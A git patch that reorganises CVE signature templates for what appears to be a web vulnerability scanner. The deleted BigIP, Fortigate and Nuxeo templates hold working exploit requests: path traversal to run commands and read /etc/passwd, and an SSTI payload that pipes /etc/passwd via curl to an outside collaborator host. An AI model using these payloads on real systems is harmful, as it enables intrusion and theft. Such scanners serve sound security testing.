From d68946343cea066538a73b57caf8f6d07e680709 Mon Sep 17 00:00:00 2001 
From: BEAST GLATISANT <26509147+g147@users.noreply.github.com> Date: Mon, 9 Nov 2020 10:01:13 +0530 Subject: [PATCH] added & organized cve signatures --- {cves => common}/aircontrol-rce.yaml | 0 common/bigip-cve-2020-5902.yaml | 35 ------------- common/fortigate-path-traversal.yaml | 21 -------- {cves => common}/joomla-lfi-comfabrik.yaml | 0 {cves => common}/joomla-sqli-hdwplayer.yaml | 0 common/nuxeo-ssti-rce.yaml | 34 ------------- cves/apache-ofbiz-xss-cve-2020-9496.yaml | 24 +++++++++ cves/apache-struts-rce-cve-2013-2251.yaml | 31 ++++++++++++ cves/apache-struts-rce-cve-2017-5638.yaml | 24 +++++++++ ...omcat-jkstatus-exposed-cve-2018-11759.yaml | 23 +++++++++ ...-tomcat-open-redirect-cve-2018-11784.yaml} | 8 +-- ... => apache-tomcat-put-cve-2017-12615.yaml} | 7 ++- cves/apache-tomcat-rce-cve-2020-9484.yaml | 21 ++++++++ .../artica-web-proxy-sqli-cve-2020-17506.yaml | 20 ++++++++ ...-improper-authorization-cve-2019-9733.yaml | 34 +++++++++++++ ...nfluence-path-traversal-cve-2019-3396.yaml | 24 +++++++++ ...tlassian-confluence-xss-cve-2018-5230.yaml | 22 +++++++++ cves/atlassian-rce-cve-2019-11580.yaml | 22 +++++++++ ...isco-asa-path-traversal-cve-2018-0296.yaml | 22 +++++++++ ...isco-asa-path-traversal-cve-2020-3187.yaml | 23 +++++++++ ...sco-asa-path-traversal-cve-2020-3452.yaml} | 5 +- cves/cisco-dos-cve-2020-16139.yaml | 23 +++++++++ ...-rv-320-326-config-leak-cve-2019-1653.yaml | 22 +++++++++ ...yaml => citrix-adc-lfi-cve-2020-8193.yaml} | 3 +- ...ix-adc-path-traversal-cve-2019-19781.yaml} | 34 ++++++++----- cves/citrix-code-injection-cve-2020-8194.yaml | 23 +++++++++ cves/citrix-lfi.yaml | 19 ------- ... 
citrix-path-traversal-cve-2020-7473.yaml} | 18 +++++-- cves/citrix-reflected-xss-cve-2020-8191.yaml | 23 +++++++++ cves/citrix-sharefile-exposed.yaml | 21 -------- ...harefile-path-traversal-cve-2020-8982.yaml | 21 ++++++++ cves/comodo-utmc-rce-cve-2018-17431.yaml | 30 ++++++++++++ ...aconomy-path-traversal-cve-2019-12314.yaml | 22 +++++++++ cves/emerge-rce-cve-2019-7256.yaml | 29 +++++++++++ ...qvision-web-service-rce-cve-2020-9047.yaml | 22 +++++++++ cves/f5-bigip-rce-cve-2020-5902.yaml | 31 ++++++++++++ ...vpn-path-traversal-xss-cve-2018-13379.yaml | 16 ++++-- cves/fuelcms-rce-cve-2018-16763.yaml | 22 +++++++++ cves/glpi-open-redirect-cve-2020-11034.yaml | 24 +++++++++ ...improper-authorization-cve-2019-15043.yaml | 26 ++++++++++ cves/grafana-dos-cve-2020-13379.yaml | 21 ++++++++ ... graphql-playround-xss-cve-2020-4038.yaml} | 5 +- ...missing-authorization-cve-2019-16097.yaml} | 7 ++- cves/icewarp-lfi-cve-2019-12593.yaml | 30 ++++++++++++ cves/icewarp-webmail-xss-cve-2020-8512.yaml | 21 ++++++++ ...imind-server-info-leak-cve-2020-24765.yaml | 20 ++++++++ ...improper-authentication-cve-2020-8772.yaml | 22 +++++++++ ...oss-seam-code-execution-cve-2010-1871.yaml | 23 +++++++++ cves/jenkins-audit-xss.yaml | 25 ---------- cves/jenkins-gitlab-xss-cve-2020-2096.yaml | 22 +++++++++ cves/jenkins-gitlab-xss.yaml | 33 ------------- cves/jenkins-xss-cve-2019-10475.yaml | 38 ++++++++++++++ cves/jenkins-xss-cve-2020-2140.yaml | 23 +++++++++ ...ss.yaml => jenkins-xss-cve-2020-2199.yaml} | 9 ++-- cves/jenkins-xss.yaml | 28 ----------- ...-improper-authorization-cve-2019-8446.yaml | 32 ++++++++++++ cves/jira-info-leak-cve-2019-8449.yaml | 22 +++++++++ cves/jira-info-leak-cve-2020-14179.yaml | 24 +++++++++ cves/jira-lfi.yaml | 31 ------------ cves/jira-path-traversal-cve-2019-8442.yaml | 23 +++++++++ cves/jira-ssrf-cve-2017-9506.yaml | 22 +++++++++ cves/jira-ssrf-cve-2019-8451.yaml | 23 +++++++++ cves/jira-ssrf.yaml | 31 ------------ cves/jira-ssti-cve-2019-11581.yaml | 22 
+++++++++ .../jira-user-enumeration-cve-2020-14181.yaml | 23 +++++++++ cves/jira-xss-cve-2018-20824.yaml | 22 +++++++++ cves/jira-xss-cve-2020-9344.yaml | 49 +++++++++++++++++++ cves/jolokia-xss-cve-2018-1000129.yaml | 23 +++++++++ ...timelion-code-execution-cve-2019-7609.yaml | 24 +++++++++ ...improper-authorization-cve-2020-11710.yaml | 23 +++++++++ cves/kong-cve-2020-11710 copy.yaml | 26 ---------- cves/kong-cve-2020-11710.yaml | 26 ---------- .../kubelet-pprof-exposed-cve-2019-11248.yaml | 22 +++++++++ ...mproper-authentication-cve-2018-18264.yaml | 23 +++++++++ cves/linuxki-rce-cve-2020-7209.yaml | 24 +++++++++ .../lotus-domino-info-leak-cve-2005-2428.yaml | 21 ++++++++ ...improper-authentication-cve-2020-5777.yaml | 20 ++++++++ cves/magento-magmi-xss-cve-2017-7391.yaml | 22 +++++++++ ...ara-cms-reflective-xss-cve-2020-24223.yaml | 23 +++++++++ cves/mida-eframework-rce-cve-2020-15920.yaml | 23 +++++++++ ...aml => mobileiron-rce-cve-2020-15505.yaml} | 9 ++-- cves/ms-sharepoint-rce-cve-2020-1147.yaml | 22 +++++++++ cves/ms-sharepoint-rce-cve-2020-16952.yaml | 20 ++++++++ ...sweeper-code-injection-cve-2020-13167.yaml | 25 ++++++++++ cves/nextjs-disclosure.yaml | 22 --------- cves/nextjs-path-traversal-cve-2020-5284.yaml | 24 +++++++++ ...repository-manager-rce-cve-2019-7238.yaml} | 6 +-- ...repository-manager-rce-cve-2020-10199.yaml | 25 ++++++++++ ...repository-manager-rce-cve-2020-10204.yaml | 24 +++++++++ ...remote-integer-overflow-cve-2017-7529.yaml | 23 +++++++++ .../nodejs-path-traversal-cve-2017-14849.yaml | 22 +++++++++ cves/nodejs-path-traversal-cve-2018-3714.yaml | 22 +++++++++ cves/nostromo-rce-cve-2019-16278.yaml | 23 +++++++++ cves/nuxeo-ssti-cve-2018-16341.yaml | 21 ++++++++ cves/odoo-lfi-cve-2018-15640.yaml | 31 ++++++++++++ cves/olimpoks-xss-cve-2020-16270.yaml | 23 +++++++++ cves/openfire-ssrf-cve-2019-18394.yaml | 22 +++++++++ cves/openfire-ssrf.yaml | 22 --------- ...l => openproject-sqli-cve-2019-11600.yaml} | 7 ++- 
cves/openschool-xss-cve-2019-14696.yaml | 22 +++++++++ ...racle-bi-path-traversal-cve-2019-2588.yaml | 22 +++++++++ ...improper-authorization-cve-2020-9315.yaml} | 8 ++- cves/oracle-sgd-xss-cve-2018-19439.yaml | 22 +++++++++ cves/oracle-webcenter-xss-cve-2017-10075.yaml | 30 ++++++++++++ cves/oracle-webcenter-xss-cve-2018-2791.yaml | 22 +++++++++ ...c-console-auth-bypass-cve-2020-14750.yaml} | 4 +- ...onsole-rce-cve-2020\342\200\22314882.yaml" | 0 ...-rce-probe-cve-2020\342\200\22314882.yaml" | 2 +- cves/oracle-weblogic-rce-cve-2019-2725.yaml | 30 ++++++++++++ cves/oracle-weblogic-rce-cve-2020-14882.yaml | 37 ++++++++++++++ cves/oracle-weblogic-rce-cve-2020-2551.yaml | 23 +++++++++ ...erkzeug-path-traversal-cve-2019-14322.yaml | 24 +++++++++ cves/php-rce-cve-2019-11043.yaml | 20 ++++++++ ...-rce.yaml => php7-rce-cve-2019-11043.yaml} | 2 +- cves/phpmychat-xss-cve-2019-19908.yaml | 22 +++++++++ .../phpunit-code-injection-cve-2017-9841.yaml | 33 +++++++++++++ ...connect-path-traversal-cve-2019-11510.yaml | 22 +++++++++ cves/pulse-vpn-lfi.yaml | 16 ------ .../qdpm-authenticated-rce-cve-2020-7246.yaml | 25 ++++++++++ cves/qnap-ps-rce-cve-2019-7192.yaml | 22 +++++++++ cves/qnap-qts-rce-cve-2017-6360.yaml | 22 +++++++++ cves/qnap-qts-rce-cve-2017-6361.yaml | 22 +++++++++ cves/rails-cve-2018-3760.yaml | 26 ---------- cves/rails-cve-2019-5418.yaml | 28 ----------- cves/rails-info-leak-cve-2019-5418.yaml | 35 +++++++++++++ cves/rails-rce-cve-2020-8163.yaml | 21 ++++++++ ...ils-sprockets-info-leak-cve-2018-3760.yaml | 33 +++++++++++++ cves/rconfig-rce-cve-2019-16662.yaml | 22 +++++++++ cves/rconfig-sqli-cve-2020-10220.yaml | 23 +++++++++ ...onsive-filemanager-lfi-cve-2018-14728.yaml | 24 +++++++++ cves/revive-adserver-xss-cve-2020-8115.yaml | 24 +++++++++ cves/rsa-xss-cve-2018-1247.yaml | 22 +++++++++ cves/rumpus-ftp-xss-cve-2019-19368.yaml | 20 ++++++++ ...improper-authentication-cve-2020-6287.yaml | 11 ++--- ...avsoft-quiz-stored-xss-cve-2020-24609.yaml | 23 +++++++++ 
cves/seomatic-ssti-cve-2020-9757.yaml | 24 +++++++++ cves/solarwinds-xss-cve-2018-19386.yaml | 22 +++++++++ ...-rce.yaml => solr-rce-cve-2019-17558.yaml} | 18 +++---- cves/sophos-xg-sqli-cve-2020-12271.yaml | 23 +++++++++ cves/splunk-info-leak-cve-2018-11409.yaml | 23 +++++++++ cves/splunk-license.yaml | 18 ------- ...ng-cloud-path-traversal-cve-2019-3799.yaml | 22 +++++++++ ...ng-cloud-path-traversal-cve-2020-5405.yaml | 33 +++++++++++++ ...ng-cloud-path-traversal-cve-2020-5410.yaml | 21 ++++++++ cves/spring-cloud-ssrf-cve-2020-5412.yaml | 24 +++++++++ cves/spring-cve-2020-5405.yaml | 29 ----------- ...spring-data-commons-rce-cve-2018-1273.yaml | 33 +++++++++++++ cves/spring-lfi.yaml | 27 ---------- ...ring-mvc-path-traversal-cve-2018-1271.yaml | 23 +++++++++ cves/spring-mvc-rfd-cve-2020-5398.yaml | 20 ++++++++ ...be.yaml => sql-srs-rce-cve-2020-0618.yaml} | 11 ++--- cves/subrion-cms-sqli-cve-2017-11444.yaml | 22 +++++++++ cves/sugarcrm-xss-cve-2019-14974.yaml | 22 +++++++++ cves/tableau-dom-xss-cve-2019-19719.yaml | 22 +++++++++ ...nkadmin-path-traversal-cve-2020-25540.yaml | 23 +++++++++ cves/thinkphp-rce-cve-2018-20062.yaml | 22 +++++++++ cves/thinkphp-rce-cve-2019-9082.yaml | 24 +++++++++ cves/timesheet-xss-cve-2019-1010287.yaml | 23 +++++++++ cves/tomcat-jkstatus.yaml | 22 --------- .../totaljs-path-traversal-cve-2019-8903.yaml | 20 ++++++++ .../traefik-open-redirect-cve-2020-15129.yaml | 22 +++++++++ ...trixbox-path-traversal-cve-2017-14537.yaml | 32 ++++++++++++ cves/typo3-xss-cve-2020-8091.yaml | 24 +++++++++ cves/uwsgi-path-traversal-cve-2018-7490.yaml | 20 ++++++++ cves/vbulletin-rce-cve-2019-16759.yaml | 40 +++++++++++++++ ...aml => vbulletin-sqli-cve-2020-12720.yaml} | 11 ++--- cves/vcenter-lfi-cve-2020-3952.yaml | 29 +++++++++++ cves/wavemaker-studio-lfi-cve-2019-8982.yaml | 22 +++++++++ cves/webmin-rce-cve-2019-15107.yaml | 24 +++++++++ .../webport-reflected-xss-cve-2019-12461.yaml | 22 +++++++++ .../wordpress-backup-leak-cve-2020-24312.yaml | 23 
+++++++++ cves/wordpress-db-reset-cve-2020-7048.yaml | 20 ++++++++ cves/wordpress-dos-cve-2018-6389.yaml | 23 +++++++++ .../wordpress-file-upload-cve-2020-25213.yaml | 20 ++++++++ ...improper-authorization-cve-2019-19985.yaml | 22 +++++++++ ...yaml => wordpress-lfi-cve-2019-14205.yaml} | 6 +-- ...ordpress-reflected-xss-cve-2019-20141.yaml | 23 +++++++++ cves/wordpress-rfi-cve-2019-6715.yaml | 24 +++++++++ cves/wordpress-rfi-cve-2019-9978.yaml | 23 +++++++++ cves/wordpress-sqli-cve-2020-11530.yaml | 23 +++++++++ cves/wordpress-stored-xss-cve-2018-18069.yaml | 24 +++++++++ cves/wordpress-xss-cve-2019-6112.yaml | 22 +++++++++ ...mproper-authentication-cve-2019-17382.yaml | 22 +++++++++ ...xxe.yaml => zimbra-rce-cve-2019-9670.yaml} | 14 +++--- cves/zoho-path-traversal-cve-2020-12116.yaml | 23 +++++++++ cves/zyxel-nas-rce-cve-2020-9054.yaml | 21 ++++++++ 186 files changed, 3438 insertions(+), 649 deletions(-) rename {cves => common}/aircontrol-rce.yaml (100%) delete mode 100644 common/bigip-cve-2020-5902.yaml delete mode 100644 common/fortigate-path-traversal.yaml rename {cves => common}/joomla-lfi-comfabrik.yaml (100%) rename {cves => common}/joomla-sqli-hdwplayer.yaml (100%) delete mode 100644 common/nuxeo-ssti-rce.yaml create mode 100644 cves/apache-ofbiz-xss-cve-2020-9496.yaml create mode 100644 cves/apache-struts-rce-cve-2013-2251.yaml create mode 100644 cves/apache-struts-rce-cve-2017-5638.yaml create mode 100644 cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml rename cves/{tomcat-open-redirect.yaml => apache-tomcat-open-redirect-cve-2018-11784.yaml} (63%) rename cves/{tomcat-put-method.yaml => apache-tomcat-put-cve-2017-12615.yaml} (81%) create mode 100644 cves/apache-tomcat-rce-cve-2020-9484.yaml create mode 100644 cves/artica-web-proxy-sqli-cve-2020-17506.yaml create mode 100644 cves/artifactory-improper-authorization-cve-2019-9733.yaml create mode 100644 cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml create mode 100644 
cves/atlassian-confluence-xss-cve-2018-5230.yaml create mode 100644 cves/atlassian-rce-cve-2019-11580.yaml create mode 100644 cves/cisco-asa-path-traversal-cve-2018-0296.yaml create mode 100644 cves/cisco-asa-path-traversal-cve-2020-3187.yaml rename cves/{cisco-asa-lfi.yaml => cisco-asa-path-traversal-cve-2020-3452.yaml} (91%) create mode 100644 cves/cisco-dos-cve-2020-16139.yaml create mode 100644 cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml rename cves/{citrix-adc-lfi.yaml => citrix-adc-lfi-cve-2020-8193.yaml} (96%) rename cves/{citrix-rce.yaml => citrix-adc-path-traversal-cve-2019-19781.yaml} (56%) create mode 100644 cves/citrix-code-injection-cve-2020-8194.yaml delete mode 100644 cves/citrix-lfi.yaml rename cves/{citrix-sharefile-lfi.yaml => citrix-path-traversal-cve-2020-7473.yaml} (52%) create mode 100644 cves/citrix-reflected-xss-cve-2020-8191.yaml delete mode 100644 cves/citrix-sharefile-exposed.yaml create mode 100644 cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml create mode 100644 cves/comodo-utmc-rce-cve-2018-17431.yaml create mode 100644 cves/deltek-maconomy-path-traversal-cve-2019-12314.yaml create mode 100644 cves/emerge-rce-cve-2019-7256.yaml create mode 100644 cves/exacqvision-web-service-rce-cve-2020-9047.yaml create mode 100644 cves/f5-bigip-rce-cve-2020-5902.yaml rename common/fortigate-xss.yaml => cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml (61%) create mode 100644 cves/fuelcms-rce-cve-2018-16763.yaml create mode 100644 cves/glpi-open-redirect-cve-2020-11034.yaml create mode 100644 cves/grafana-api-improper-authorization-cve-2019-15043.yaml create mode 100644 cves/grafana-dos-cve-2020-13379.yaml rename cves/{graphql-playround-xss.yaml => graphql-playround-xss-cve-2020-4038.yaml} (89%) rename cves/{harboar-cve-2019-16097.yaml => harbor-missing-authorization-cve-2019-16097.yaml} (75%) create mode 100644 cves/icewarp-lfi-cve-2019-12593.yaml create mode 100644 cves/icewarp-webmail-xss-cve-2020-8512.yaml 
create mode 100644 cves/imind-server-info-leak-cve-2020-24765.yaml create mode 100644 cves/infinitewp-improper-authentication-cve-2020-8772.yaml create mode 100644 cves/jboss-seam-code-execution-cve-2010-1871.yaml delete mode 100644 cves/jenkins-audit-xss.yaml create mode 100644 cves/jenkins-gitlab-xss-cve-2020-2096.yaml delete mode 100644 cves/jenkins-gitlab-xss.yaml create mode 100644 cves/jenkins-xss-cve-2019-10475.yaml create mode 100644 cves/jenkins-xss-cve-2020-2140.yaml rename cves/{jenkins-subversion-xss.yaml => jenkins-xss-cve-2020-2199.yaml} (64%) delete mode 100644 cves/jenkins-xss.yaml create mode 100644 cves/jira-improper-authorization-cve-2019-8446.yaml create mode 100644 cves/jira-info-leak-cve-2019-8449.yaml create mode 100644 cves/jira-info-leak-cve-2020-14179.yaml delete mode 100644 cves/jira-lfi.yaml create mode 100644 cves/jira-path-traversal-cve-2019-8442.yaml create mode 100644 cves/jira-ssrf-cve-2017-9506.yaml create mode 100644 cves/jira-ssrf-cve-2019-8451.yaml delete mode 100644 cves/jira-ssrf.yaml create mode 100644 cves/jira-ssti-cve-2019-11581.yaml create mode 100644 cves/jira-user-enumeration-cve-2020-14181.yaml create mode 100644 cves/jira-xss-cve-2018-20824.yaml create mode 100644 cves/jira-xss-cve-2020-9344.yaml create mode 100644 cves/jolokia-xss-cve-2018-1000129.yaml create mode 100644 cves/kibana-timelion-code-execution-cve-2019-7609.yaml create mode 100644 cves/kong-api-improper-authorization-cve-2020-11710.yaml delete mode 100644 cves/kong-cve-2020-11710 copy.yaml delete mode 100644 cves/kong-cve-2020-11710.yaml create mode 100644 cves/kubelet-pprof-exposed-cve-2019-11248.yaml create mode 100644 cves/kubernetes-improper-authentication-cve-2018-18264.yaml create mode 100644 cves/linuxki-rce-cve-2020-7209.yaml create mode 100644 cves/lotus-domino-info-leak-cve-2005-2428.yaml create mode 100644 cves/magento-magmi-improper-authentication-cve-2020-5777.yaml create mode 100644 cves/magento-magmi-xss-cve-2017-7391.yaml create mode 
100644 cves/mara-cms-reflective-xss-cve-2020-24223.yaml create mode 100644 cves/mida-eframework-rce-cve-2020-15920.yaml rename cves/{mobileiron-rce-probe.yaml => mobileiron-rce-cve-2020-15505.yaml} (71%) create mode 100644 cves/ms-sharepoint-rce-cve-2020-1147.yaml create mode 100644 cves/ms-sharepoint-rce-cve-2020-16952.yaml create mode 100644 cves/netsweeper-code-injection-cve-2020-13167.yaml delete mode 100644 cves/nextjs-disclosure.yaml create mode 100644 cves/nextjs-path-traversal-cve-2020-5284.yaml rename cves/{nexus-cve-2019-7238.yaml => nexus-repository-manager-rce-cve-2019-7238.yaml} (98%) create mode 100644 cves/nexus-repository-manager-rce-cve-2020-10199.yaml create mode 100644 cves/nexus-repository-manager-rce-cve-2020-10204.yaml create mode 100644 cves/nginx-remote-integer-overflow-cve-2017-7529.yaml create mode 100644 cves/nodejs-path-traversal-cve-2017-14849.yaml create mode 100644 cves/nodejs-path-traversal-cve-2018-3714.yaml create mode 100644 cves/nostromo-rce-cve-2019-16278.yaml create mode 100644 cves/nuxeo-ssti-cve-2018-16341.yaml create mode 100644 cves/odoo-lfi-cve-2018-15640.yaml create mode 100644 cves/olimpoks-xss-cve-2020-16270.yaml create mode 100644 cves/openfire-ssrf-cve-2019-18394.yaml delete mode 100644 cves/openfire-ssrf.yaml rename cves/{openproject-sqli.yaml => openproject-sqli-cve-2019-11600.yaml} (81%) create mode 100644 cves/openschool-xss-cve-2019-14696.yaml create mode 100644 cves/oracle-bi-path-traversal-cve-2019-2588.yaml rename cves/{iplanet-disclosure.yaml => oracle-iplanet-improper-authorization-cve-2020-9315.yaml} (78%) create mode 100644 cves/oracle-sgd-xss-cve-2018-19439.yaml create mode 100644 cves/oracle-webcenter-xss-cve-2017-10075.yaml create mode 100644 cves/oracle-webcenter-xss-cve-2018-2791.yaml rename cves/{weblogic-console-auth-bypass.yaml => oracle-weblogic-console-auth-bypass-cve-2020-14750.yaml} (83%) rename cves/weblogic-console-rce.yaml => "cves/oracle-weblogic-console-rce-cve-2020\342\200\22314882.yaml" 
(100%) rename cves/weblogic-console-rce-probe.yaml => "cves/oracle-weblogic-console-rce-probe-cve-2020\342\200\22314882.yaml" (95%) create mode 100644 cves/oracle-weblogic-rce-cve-2019-2725.yaml create mode 100644 cves/oracle-weblogic-rce-cve-2020-14882.yaml create mode 100644 cves/oracle-weblogic-rce-cve-2020-2551.yaml create mode 100644 cves/pallets-werkzeug-path-traversal-cve-2019-14322.yaml create mode 100644 cves/php-rce-cve-2019-11043.yaml rename cves/{php7-rce.yaml => php7-rce-cve-2019-11043.yaml} (96%) create mode 100644 cves/phpmychat-xss-cve-2019-19908.yaml create mode 100644 cves/phpunit-code-injection-cve-2017-9841.yaml create mode 100644 cves/pulse-connect-path-traversal-cve-2019-11510.yaml delete mode 100644 cves/pulse-vpn-lfi.yaml create mode 100644 cves/qdpm-authenticated-rce-cve-2020-7246.yaml create mode 100644 cves/qnap-ps-rce-cve-2019-7192.yaml create mode 100644 cves/qnap-qts-rce-cve-2017-6360.yaml create mode 100644 cves/qnap-qts-rce-cve-2017-6361.yaml delete mode 100644 cves/rails-cve-2018-3760.yaml delete mode 100644 cves/rails-cve-2019-5418.yaml create mode 100644 cves/rails-info-leak-cve-2019-5418.yaml create mode 100644 cves/rails-rce-cve-2020-8163.yaml create mode 100644 cves/rails-sprockets-info-leak-cve-2018-3760.yaml create mode 100644 cves/rconfig-rce-cve-2019-16662.yaml create mode 100644 cves/rconfig-sqli-cve-2020-10220.yaml create mode 100644 cves/responsive-filemanager-lfi-cve-2018-14728.yaml create mode 100644 cves/revive-adserver-xss-cve-2020-8115.yaml create mode 100644 cves/rsa-xss-cve-2018-1247.yaml create mode 100644 cves/rumpus-ftp-xss-cve-2019-19368.yaml rename common/sap-netweaver-create-admin-user.yaml => cves/sap-netweaver-improper-authentication-cve-2020-6287.yaml (93%) create mode 100644 cves/savsoft-quiz-stored-xss-cve-2020-24609.yaml create mode 100644 cves/seomatic-ssti-cve-2020-9757.yaml create mode 100644 cves/solarwinds-xss-cve-2018-19386.yaml rename cves/{solr-rce.yaml => solr-rce-cve-2019-17558.yaml} (59%) 
create mode 100644 cves/sophos-xg-sqli-cve-2020-12271.yaml create mode 100644 cves/splunk-info-leak-cve-2018-11409.yaml delete mode 100644 cves/splunk-license.yaml create mode 100644 cves/spring-cloud-path-traversal-cve-2019-3799.yaml create mode 100644 cves/spring-cloud-path-traversal-cve-2020-5405.yaml create mode 100644 cves/spring-cloud-path-traversal-cve-2020-5410.yaml create mode 100644 cves/spring-cloud-ssrf-cve-2020-5412.yaml delete mode 100644 cves/spring-cve-2020-5405.yaml create mode 100644 cves/spring-data-commons-rce-cve-2018-1273.yaml delete mode 100644 cves/spring-lfi.yaml create mode 100644 cves/spring-mvc-path-traversal-cve-2018-1271.yaml create mode 100644 cves/spring-mvc-rfd-cve-2020-5398.yaml rename cves/{sql-report-server-probe.yaml => sql-srs-rce-cve-2020-0618.yaml} (62%) create mode 100644 cves/subrion-cms-sqli-cve-2017-11444.yaml create mode 100644 cves/sugarcrm-xss-cve-2019-14974.yaml create mode 100644 cves/tableau-dom-xss-cve-2019-19719.yaml create mode 100644 cves/thinkadmin-path-traversal-cve-2020-25540.yaml create mode 100644 cves/thinkphp-rce-cve-2018-20062.yaml create mode 100644 cves/thinkphp-rce-cve-2019-9082.yaml create mode 100644 cves/timesheet-xss-cve-2019-1010287.yaml delete mode 100644 cves/tomcat-jkstatus.yaml create mode 100644 cves/totaljs-path-traversal-cve-2019-8903.yaml create mode 100644 cves/traefik-open-redirect-cve-2020-15129.yaml create mode 100644 cves/trixbox-path-traversal-cve-2017-14537.yaml create mode 100644 cves/typo3-xss-cve-2020-8091.yaml create mode 100644 cves/uwsgi-path-traversal-cve-2018-7490.yaml create mode 100644 cves/vbulletin-rce-cve-2019-16759.yaml rename cves/{vbulletin-sqli.yaml => vbulletin-sqli-cve-2020-12720.yaml} (92%) create mode 100644 cves/vcenter-lfi-cve-2020-3952.yaml create mode 100644 cves/wavemaker-studio-lfi-cve-2019-8982.yaml create mode 100644 cves/webmin-rce-cve-2019-15107.yaml create mode 100644 cves/webport-reflected-xss-cve-2019-12461.yaml create mode 100644 
cves/wordpress-backup-leak-cve-2020-24312.yaml create mode 100644 cves/wordpress-db-reset-cve-2020-7048.yaml create mode 100644 cves/wordpress-dos-cve-2018-6389.yaml create mode 100644 cves/wordpress-file-upload-cve-2020-25213.yaml create mode 100644 cves/wordpress-improper-authorization-cve-2019-19985.yaml rename cves/{wordpress-lfi.yaml => wordpress-lfi-cve-2019-14205.yaml} (91%) create mode 100644 cves/wordpress-reflected-xss-cve-2019-20141.yaml create mode 100644 cves/wordpress-rfi-cve-2019-6715.yaml create mode 100644 cves/wordpress-rfi-cve-2019-9978.yaml create mode 100644 cves/wordpress-sqli-cve-2020-11530.yaml create mode 100644 cves/wordpress-stored-xss-cve-2018-18069.yaml create mode 100644 cves/wordpress-xss-cve-2019-6112.yaml create mode 100644 cves/zabbix-improper-authentication-cve-2019-17382.yaml rename cves/{zimbra-xxe.yaml => zimbra-rce-cve-2019-9670.yaml} (76%) create mode 100644 cves/zoho-path-traversal-cve-2020-12116.yaml create mode 100644 cves/zyxel-nas-rce-cve-2020-9054.yaml diff --git a/cves/aircontrol-rce.yaml b/common/aircontrol-rce.yaml similarity index 100% rename from cves/aircontrol-rce.yaml rename to common/aircontrol-rce.yaml diff --git a/common/bigip-cve-2020-5902.yaml b/common/bigip-cve-2020-5902.yaml deleted file mode 100644 index 170047b..0000000 --- a/common/bigip-cve-2020-5902.yaml +++ /dev/null 
@@ -1,35 +0,0 @@ -id: bigip-rce-cve-2020-5902 -info: - name: BigIP F5 RCE CVE-2020-5902 - risk: High - confidence: Certain - -params: - - root: "{{.BaseURL}}" - -requests: - - method: GET - redirect: false - url: >- - {{.root}}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && StringSearch('body', 'output"') && StringSearch('body', '{"error"') - - # other interesting files - # /config/bigip.license, /config/bigip.conf - - method: GET - redirect: false - url: >- - {{.root}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && StringSearch('body', 'root:x') && StringSearch('body', 'bin:') - -references: - - link: https://support.f5.com/csp/article/K52145254 - - rce_root: https://github.com/rapid7/metasploit-framework/blob/41bb4d3a8d64ac7cb829539205991b80b6f77686/modules/exploits/linux/http/f5_bigip_tmui_rce.rb \ No newline at end of file diff --git a/common/fortigate-path-traversal.yaml b/common/fortigate-path-traversal.yaml deleted file mode 100644 index e9dab51..0000000 --- a/common/fortigate-path-traversal.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: fortigate-path-traversal -info: - name: Fortinet VPN Path Traversal - CVE-2018-13379 - risk: High - -params: - - root: "{{.BaseURL}}" - -requests: - - method: GET - redirect: false - url: >- - {{.root}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && StringSearch("resHeaders", "application/javascript") && StringSearch("body", "fgt_lang") - -references: - - link: https://www.exploit-db.com/exploits/47287 
diff --git a/cves/joomla-lfi-comfabrik.yaml b/common/joomla-lfi-comfabrik.yaml similarity index 100% rename from cves/joomla-lfi-comfabrik.yaml rename to common/joomla-lfi-comfabrik.yaml diff --git a/cves/joomla-sqli-hdwplayer.yaml b/common/joomla-sqli-hdwplayer.yaml similarity index 100% rename from cves/joomla-sqli-hdwplayer.yaml rename to common/joomla-sqli-hdwplayer.yaml diff --git a/common/nuxeo-ssti-rce.yaml b/common/nuxeo-ssti-rce.yaml deleted file mode 100644 index 30d8eac..0000000 --- a/common/nuxeo-ssti-rce.yaml +++ /dev/null 
@@ -1,34 +0,0 @@ -id: nuxeo-ssti-rce -info: - name: Nuxeo SSTI RCE - CVE-2018-16341 - risk: Critical - -params: - - root: "{{.BaseURL}}" - -requests: - - method: GET - redirect: false - url: >- - {{.root}}/nuxeo/login.jsp/pwn${1199128+7}.xhtml - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && StringSearch("response", "facelet") && StringSearch("response", "1199135") - -references: - - link: https://github.com/mpgn/CVE-2018-16341 - - link2: https://blog.riskivy.com/nuxeo-rce-analysis-cve-2018-16341/ - - rce: | - http://example.com/nuxeo/login.jsp/pwn${expressions.getClass().forName('java.io.BufferedReader').getDeclaredMethod('readLine').invoke(''.getClass().forName('java.io.BufferedReader').getConstructor(''.getClass().forName('java.io.Reader')).newInstance(''.getClass().forName('java.io.InputStreamReader').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Process').getDeclaredMethod('getInputStream').invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(null),'pwd')))))}.xhtml - - rce2: | - GET /nuxeo/login.jsp/pwn${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("curl%20--data-binary%20@/etc/passwd%20xkl8uq9g5c7qnblke1tg153ppgv8jx.burpcollaborator.net",null).waitFor()}.xhtml HTTP/1.1 - Host: target - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0 